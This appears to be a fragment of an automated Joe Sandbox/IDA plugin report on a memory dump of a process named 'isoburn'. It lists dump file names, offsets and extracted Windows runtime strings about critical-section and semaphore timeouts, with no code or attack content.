                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 04ED7BAC
                                                                                • RTL: Resource at %p, xrefs: 04ED7B8E
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04ED7B7F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04ED728C
                                                                                Strings
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04ED7294
                                                                                • RTL: Re-Waiting, xrefs: 04ED72C1
                                                                                • RTL: Resource at %p, xrefs: 04ED72A3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                APIs
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 04EECFBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: CallFilterFunc@8
                                                                                • String ID: @$@4rw@4rw
                                                                                • API String ID: 4062629308-2979693914